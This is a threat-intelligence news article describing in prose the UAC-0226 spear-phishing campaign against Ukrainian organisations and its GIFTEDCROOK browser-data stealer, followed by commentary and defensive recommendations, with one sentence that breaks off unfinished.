Cyber-Espionage Campaign Targets Ukrainian Organizations with New GIFTEDCROOK Malware

In recent months, Ukraine has become a central focus of cyber-espionage campaigns, with critical government and military organizations bearing the brunt of increasingly sophisticated attacks. The UAC-0226 hacking group has launched an ongoing campaign using a new malware strain called GIFTEDCROOK. This new wave of cyberattacks, first identified by CERT-UA on April 6, 2025, represents a growing threat to the country’s national security. Ukrainian organizations, particularly in military and law enforcement sectors, are at significant risk, as the group exploits weaknesses in cybersecurity through phishing techniques and advanced malware. The GIFTEDCROOK malware has been engineered to steal sensitive information, including browser data and credentials, by infiltrating systems and exfiltrating data to external platforms.

Key Points

The UAC-0226 hacking group has been actively targeting Ukrainian critical infrastructure since February 2025, focusing on military innovation centers, armed forces units, law enforcement, and local governments, especially in areas near the conflict-prone eastern border. The primary aim of these attacks is to steal sensitive data, including personal and institutional information, through the use of advanced malware and phishing techniques.

A major vector of attack is spear-phishing, where cybercriminals use malicious Excel files (.xlsm) as carriers for malware. These files are typically disguised under innocuous subjects such as landmine clearance, drone production, and administrative fines. The Excel documents contain base64-encoded payloads that are activated when the victim enables macros. Once activated, the payloads deploy a series of malware strains on the target systems.

Two distinct malware strains have been identified in the ongoing campaign. The first is a .NET-based tool incorporating a PowerShell reverse shell script. The second, more sophisticated malware strain is GIFTEDCROOK, a stealer written in C/C++. GIFTEDCROOK specifically targets popular web browsers like Chrome, Edge, and Firefox, extracting sensitive data, such as cookies, saved passwords, and browsing history. The data is then compressed using PowerShell’s Compress-Archive cmdlet and exfiltrated through the encrypted messaging platform, Telegram.

The campaign has been particularly insidious as the attackers have taken advantage of compromised accounts to launch phishing emails, increasing the likelihood of successful infections. CERT-UA has issued guidance to Ukrainian organizations, recommending enhanced monitoring of email and web server logs to detect any malicious activity. Security teams are urged to adopt proactive detection mechanisms and leverage threat intelligence tools to thwart the campaign.

What Undercode Says:

The rise of the GIFTEDCROOK malware under the UAC-0226 group’s campaign is a stark reminder of the evolving nature of cyber-espionage and its growing sophistication. Phishing attacks remain a dominant tactic in the cybersecurity landscape, but the inclusion of advanced malware strains like GIFTEDCROOK showcases a new level of precision and targeting. By exploiting the everyday tools that organizations rely on, such as Excel documents, the attackers significantly lower the barriers to entry, making their attacks much harder to detect.

What sets GIFTEDCROOK apart is its ability to target a broad range of data, particularly sensitive user information stored within web browsers. This focus on credentials and personal data emphasizes the attackers’ intent to further disrupt national security and leverage stolen information for future operations. The use of Telegram for data exfiltration is an example of how attackers are evolving to use legitimate communication platforms for malicious purposes, making the data harder to trace.

The MITRE ATT&CK® framework plays a crucial role in understanding the tactics and techniques employed in these attacks. By mapping the UAC-0226 group’s behaviors to this framework, CERT-UA has provided critical insights that can help organizations better prepare and respond. The tactics outlined, such as spear-phishing and the use of PowerShell for execution, underscore the importance of robust email filtering systems and endpoint protections.

The involvement of state-sponsored groups in cyber-espionage campaigns targeting critical sectors like defense and government highlights the high stakes of these attacks. The ability to quickly detect and respond to such sophisticated threats is essential for minimizing the impact on national security.

As cyber-espionage continues to rise globally, especially targeting countries in conflict zones, organizations must remain vigilant and adopt advanced defensive measures. The integration of threat intelligence platforms like the SOC Prime Platform, which offers Sigma rules and AI-based tools, will be essential in the ongoing battle against state-sponsored cyber threats.

Given the strategic importance of the Ukrainian targets,

Fact Checker Results:

The identification of UAC-0226 and their use of GIFTEDCROOK malware is consistent with ongoing trends in state-sponsored cyber-attacks, particularly targeting military and government organizations.
The use of Telegram for data exfiltration is a known tactic among cybercriminal groups, reflecting an increasing reliance on encrypted communication tools for stealthy operations.